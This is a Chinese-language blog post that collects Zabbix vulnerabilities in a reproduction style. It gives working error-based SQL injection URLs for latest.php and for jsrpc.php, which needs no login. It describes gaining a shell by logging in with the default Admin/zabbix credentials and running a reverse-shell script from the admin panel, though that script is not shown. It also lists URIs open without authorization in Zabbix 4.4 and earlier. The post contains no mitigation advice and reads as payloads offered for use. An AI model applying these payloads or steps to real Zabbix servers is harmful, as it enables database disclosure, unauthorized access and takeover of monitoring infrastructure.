Zabbix漏洞合集

简介

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
zabbix由2部分构成,zabbix server与可选组件zabbix agent。
zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。百度百科

zabbix latest.php(jsrpc.php) SQL注入漏洞复现

主页:
Zabbix漏洞合集
游客账号:guest(密码为空)

其中latest.php页面需要进行登录:

payload:

latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0) 

sid为登录cookie中zbx_sessionid的后16位:
Zabbix漏洞合集

jsrpc.php不需要进行登录。

payload:

/jsrpc.php?type=0&mode=1&method=screen.get&profileldx=web.item.graph&resourcetype=17 &profileldx2=updatexml(0,concat(0xa,database()),0) 
Zabbix漏洞合集

Zabbix后台getshell

漏洞简介

使用了弱口令或默认的用户名与口令(Admin/zabbix)

漏洞复现

进入后台:
Zabbix漏洞合集

创建script:
Zabbix漏洞合集
选择服务器,并写入反弹shell的脚本:
Zabbix漏洞合集
依次点击:
Zabbix漏洞合集
选择刚刚创建的shell脚本:
Zabbix漏洞合集

则会执行脚本命令。我这里并没有成功,试了其他的shell脚本也没有成功0.0。

Zabbix未授权访问

影响范围:

Zabbix <= 4.4

可以未授权访问的uri:

/zabbix.php?action=problem.view&ddreset=1 /overview.php?ddreset=1 /srv_status.php?ddreset=1 /latest.php?ddreset=1 

这里不贴图了,某搜索引擎中一大堆。

版权声明:玥玥 发表于 2021-07-24 23:16:35。
转载请注明:Zabbix漏洞合集 | 女黑客导航